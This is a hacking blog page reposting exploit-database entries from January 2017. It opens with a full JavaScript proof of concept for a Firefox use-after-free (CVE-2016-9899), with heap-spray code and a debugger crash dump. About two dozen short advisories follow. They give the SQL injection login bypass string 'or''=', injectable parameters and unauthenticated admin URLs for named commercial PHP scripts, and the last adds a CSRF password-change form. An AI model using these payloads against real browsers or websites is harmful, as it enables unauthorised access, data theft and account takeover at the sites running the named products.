Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863293103

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

<!DOCTYPE html>
<html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
        background-color:lime;
        font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
   
   /* 
    * Mozilla Firefox < 50.1.0 Use-After-Free POC
    * Author: Marcin Ressel
    * Date: 13.01.2017
    * Vendor Homepage: www.mozilla.org
    * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
    * Version: < 50.1.0
    * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
    * CVE: CVE-2016-9899
    *************************************************
    * (b1c.5e0): Access violation - code c0000005 (first chance)
    * First chance exceptions are reported before any exception handling.
    * This exception may be expected and handled.
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
    * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
    * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0         nv up ei pl nz na pe nc
    * cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
    * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
    * 6d7cc44c ff12            call    dword ptr [edx]      ds:002b:4543484f=????????
    * 0:000> dd eax
    * 0f804c00  4543484f 91919191 91919191 91919191
    * 0f804c10  91919191 91919191 91919191 91919191
    * 0f804c20  91919191 91919191 91919191 91919191
    * 0f804c30  91919191 91919191 91919191 91919191
    * 0f804c40  91919191 91919191 91919191 91919191
    * 0f804c50  91919191 91919191 91919191 91919191
    * 0f804c60  91919191 91919191 91919191 91919191
    * 0f804c70  91919191 91919191 91919191 91919191
    *
    */ 
   var doc = null;
   var cnt = 0;

   function m(blocks,size) {
            var arr = [];
            for(var i=0;i<blocks;i++) {
                arr[i] = new Array(size);
                for(var j=0;j<size;j+=2) {
                    arr[i][j] = 0x41414141;
                    arr[i][j+1] = 0x42424242;
                }
            }
            return arr;
    } 
      
    function handler() {    //free
             if(cnt > 0) return;
             doc.body.appendChild(document.createElement("audio")).remove();      
             m(1024,1024);   
             ++cnt;
    }

    function trigger() {
             if(cnt  > 0) {
                var pl = new Array();
                doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
                for(var i=0;i<4096;i++) {           //replace
                    pl[i]=new Uint8Array(1000);
                    pl[i][0] = 0x4F;
                    pl[i][1] = 0x48;
                    pl[i][2] = 0x43;
                    pl[i][3] = 0x45; //eip  
                    for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; 
                   // pl[i] = document.createElement('media');
                    //document.body.appendChild(pl[i]);
                }
                window.pl = pl
                document.getElementById("t1").remove(); //re-use
             }
    }

    function testcase()
    {
             var df = m(4096,1000);
             document.body.setAttribute('df',df);
	     doc = document.getElementById("t1").contentWindow.document;
	     doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
	     doc.getElementsByTagName("*")[0].style = "ANNNY";
	     setInterval("trigger();",1000);   

    }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
</html>
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Professional Service Booking Script
# Script Buy Now: My Private Tutor Website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi + Add/Edit
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Hindu Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/hindu-matrimonial-script/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
#
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
#
# Direct entrance Add/Edit...
# http://localhost/[PATH]/admin/usermanagement.php
# http://localhost/[PATH]/admin/countrymanagement.php
# http://localhost/[PATH]/admin/communitymanagement.php
# http://localhost/[PATH]/admin/renewaldue.php
# http://localhost/[PATH]/admin/generalsettings.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/cms.php
# http://localhost/[PATH]/admin/newsletter1.php
# http://localhost/[PATH]/admin/payment.php
# http://localhost/[PATH]/admin/searchview.php
# http://localhost/[PATH]/admin/success_story.php
# http://localhost/[PATH]/admin/featured.php
# http://localhost/[PATH]/admin/photo.php
# http://localhost/[PATH]/admin/googleads.php
# http://localhost/[PATH]/admin/reports.php
# # # # # 
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name:  Just Dial Marketplace Script
# Script Buy Now: http://scriptfirm.com/just-dial-marketplace
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://www.phpmatrimonialscript.in/
# Script Name: Entrepreneur Matrimonial Script
# Script Buy Now: http://www.phpmatrimonialscript.in/product/entrepreneur-matrimonial/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection + Admin Login Bypass
# Date: 13.01.2017
# Vendor Homepage: http://phprealestatescript.org/
# Script Name: Open Source Real-Estate Script
# Script Buy Now: http://phprealestatescript.org/open-source-real-estate-script.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/viewpropertydetails.php?id=[SQL]
# 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Search Engine Ultimate Edition Script
# Script Version: v7.0, v8.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-search-engine/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=engine/manage_suggestion
# http://localhost/[PATH]/admin/index.php?page=databaseengine/managesettings
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage
# http://localhost/[PATH]/admin/index.php?page=seasonallogo/add
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout StickBoard Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-stickboard/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance Add/Edit/Del...
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/account/clearcache
# http://localhost/[PATH]/admin/account/changeprofileimage
# http://localhost/[PATH]/admin/account/changepassword
# http://localhost/[PATH]/admin/pin/websitepin
# http://localhost/[PATH]/admin/user/manage
# http://localhost/[PATH]/admin/user/userdetails/69
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Webmail Ultimate Edition v4.0
# Script Version: Ultimate Edition v4.0, Ultimate Hypertable Version
# Script Buy Now: http://www.inoutscripts.com/demo/inout-webmail/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=ads/sponsoredlinks
# http://localhost/[PATH]/admin/index.php?page=todolist/todolist
# http://localhost/[PATH]/admin/index.php?page=statistics/registration_showgraph
# http://localhost/[PATH]/admin/index.php?page=statistics/showgraph
# http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity
# http://localhost/[PATH]/admin/index.php?page=calendar/calendar
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout QuerySpace Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-queryspace/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/user/search
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout CareerLamp Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-careerlamp/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/statistics/js_registration_showgraph
# http://localhost/[PATH]/admin/statistics/accountactivity
# http://localhost/[PATH]/admin/statistics/js_showgraph
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout SmartDeal Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-smartdeal/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=account/changepassword
# http://localhost/[PATH]/admin/index.php?page=country/addcountry
# http://localhost/[PATH]/admin/index.php?page=account/addbank
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout SocialTiles Script
# Script Version: v2.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-socialtiles/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/index.php?page=account/statussettings
# http://localhost/[PATH]/admin/index.php?page=account/newad
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Security Bypass
# Date: 13.01.2017
# Vendor Homepage: http://www.inoutscripts.com/
# Script Name: Inout Celebrities Script
# Script Version: v1.0
# Script Buy Now: http://www.inoutscripts.com/demo/inout-celebrities/demo/
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/settings/managersssettings
# http://localhost/[PATH]/admin/settings/addrsssettings
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability:: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Education Website Script
# Script Buy Now: http://scriptfirm.com/education-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone – Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name:  Courier Business Website Script
# Script Buy Now: http://scriptfirm.com/courier-business-website
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 13.01.2017
# Vendor Homepage: http://scriptfirm.com/
# Script Name: Professional Service Booking Script
# Script Buy Now: http://scriptfirm.com/professional-service-booking-engine
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter.
# SQL Injection/Exploit :
# http://localhost/[PATH]/best_pro_details.php?service_id=[SQL]
# http://localhost/[PATH]/content.php?page=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# # # # # 
            
# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Article Directory Script Seo
# Script Version: V3.2
# Script Buy Now: http://www.e-soft24.com/article-directory-script-seo-p-338.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/alldoc.php
# http://localhost/[PATH]/admin/editdoc.php
# http://localhost/[PATH]/admin/editdoc.php?doc_id=1
# Vs.......
# # # # # 
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://www.e-soft24.com/
# Script Name: Jokes Portal Script Seo
# Script Version: v1.3
# Script Buy Now: http://www.e-soft24.com/jokes-portal-script-seo-p-370.html
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# http://localhost/[PATH]/siteadmin/ and set Username:anything and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection Web Vulnerability
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Smart Shop Script
# Script Buy Now: http://microcode.ws/product/mc-smart-shop-php-script/3855
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/category.php?id=[SQL]
# http://localhost/[PATH]/product.php?p=[Permalink]&id=[SQL]
# http://localhost/[PATH]/category.php?p=[SQL]
# http://localhost/[PATH]/product.php?p=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# 
# Admin Login Bypass
# http://localhost/[PATH]/adminlogin.php and set Mail:1@1.com and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection Web Vulnerability
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Buy and Sell Cars Script
# Script Version: V1.1
# Script Buy Now: http://microcode.ws/product/mc-buy-and-sell-cars-php-script/3878
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/car.php?c=[SQL]
# http://localhost/[PATH]/car.php?c=[Permalink]&id=[SQL]
# http://localhost/[PATH]/cateogry.php?p=search&cage=all&manufacturer=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: SQL Injection Web Vulnerability
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Yellow Pages Script
# Script Buy Now: http://microcode.ws/product/mc-yellow-pages-php-script/3800
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# SQL Injection/Exploit :
# http://localhost/[PATH]/details.php?list_id=[SQL]
# http://localhost/[PATH]/category.php?cat_id=[SQL]
# E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well.
# 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter.
# # # # # 
            
# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Real Estate Pro
# Script Buy Now: http://microcode.ws/product/mc-real-estate-pro-php-script/3858
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/admin/AddPropertyType/apt
# http://localhost/[PATH]/admin/AddNewState/Add_State
# http://localhost/[PATH]/admin/AddNewCity/Add_City
# http://localhost/[PATH]/admin/SliderTable/st
# Vs.......
# # # # #
            
# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Inventory Manager
# Script Buy Now: http://microcode.ws/product/mc-inventory-manager-php-script/3885
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # # 
# http://localhost/[PATH]/dashboard.php?p=view_sell&id=[SQL]
# http://localhost/[PATH]//dashboard.php?p=edit_item&id=[SQL]
# E.t.c.... 
# Other features have the same security vulnerability.
# Exploit:
<html>
<body>
<form action="http://localhost/[PATH]/functions/save_password.php" method="post" parsley-validate>
<fieldset>
<label>Change Password : </label>
<input type="password" placeholder="Type new password" name="password" required/>
</fieldset>
<fieldset>
<label>Re-type Password : </label>
<input type="password" placeholder="Re-Type password again" name="repassword" required/>
</fieldset>
<button type="submit" class="btn btn-sm btn-success">Save
<i class="icon-arrow-right icon-on-right bigger-110"></i>
</button>
</form>
</body>
</html>
# # # # #
# # # # #